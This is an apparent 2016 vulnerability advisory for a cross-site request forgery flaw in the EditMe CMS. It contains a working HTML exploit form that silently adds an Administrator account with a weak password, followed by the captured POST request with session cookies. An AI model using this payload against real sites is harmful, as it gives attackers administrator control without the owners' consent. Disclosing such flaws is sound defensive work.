Home / os / winmobile

CMS EditMe Cross Site Request Forgery

Posted on 14 November 2016

===================================================== [#] Exploit Title : CMS EditMe - Privilege Escalate CSRF Vulnerability [#] Date Discovered : 2016-11-04 [#] Affected Product(s): EditMe - Content Management System [#] Exploitation Technique: Remote [#] Severity Level: Medium [#] Tested OS : Windows 10 ===================================================== [#] Product & Service Introduction: =================================== EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping,and Web CMS. CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to lear. (Copy of the Vendor Homepage: http://www.editme.com/ ) [#] Technical Details & Description: ==================================== A cross site request forgery vulnerability has been discovered in the content management system EditMe. The vulnerability allows to perform malicious client-side web-application request to execute non-protected functions with own web context. In the absence of security token, an attacker could execute arbitrary code in the administrator's browser to gain unauthorized access to the administrator privileges. [#] Proof of Concept (PoC): =========================== Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction. To demonstrate safety or reproduce csrf web vulnerability information and follow the steps below to continue provided. --- PoC: CSRF Exploitation --- <html> <h2>Privilege Escalate CSRF Vulnerability</h2> <form action="http://pentest.editme.com/_Register" method="post"> <input name="mode" value="AdminAdd" type="hidden"> <input name="redirect" value="" type="hidden"> <td><select name="user-groupname"> <option value="A"selected="">Administrator</option></select></td> <input name="user-username" value="VulnerabilityLab" type="hidden"> <input name="user-password" value="1234" type="hidden"> <input name="user-password2" value="1234" type="hidden"> <input name="user-email" value="tested@live.fr"type="hidden"> <input class="button" style="font-size:110%" name="regSubmit" value="Save" type="submit"> </form> </html> --- PoC Session Logs [POST]--- Status: 200 [OK] Host: pentest.editme.com User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; __utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; __utma=1.330307796.1478254213.1478254213.1478329355.2; __utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=164978144.3.10.1478328738; __utmc=164978144; JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; __utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; editme-key="ECiu7PBk57GYeaLPUxHeDw==" Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 153 - POST Method: mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr&regSubmit=Save [#] Vulnerability Disclosure Timeline: ====================================== 2016-11-04 : Discovery of the Vulnerability 2016-11-14 : Public Disclosure [#] Disclaimer: =============== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Domain: www.zwx.fr Contact: msk4@live.fr Social: twitter.com/XSSed.fr Feeds: www.zwx.fr/feed/ Advisory: www.vulnerability-lab.com/show.php?user=ZwX packetstormsecurity.com/files/author/12026/ cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/ 0day.today/author/27461 Copyright (c) 2016 | ZwX - Security Researcher (Software & web application)

 

TOP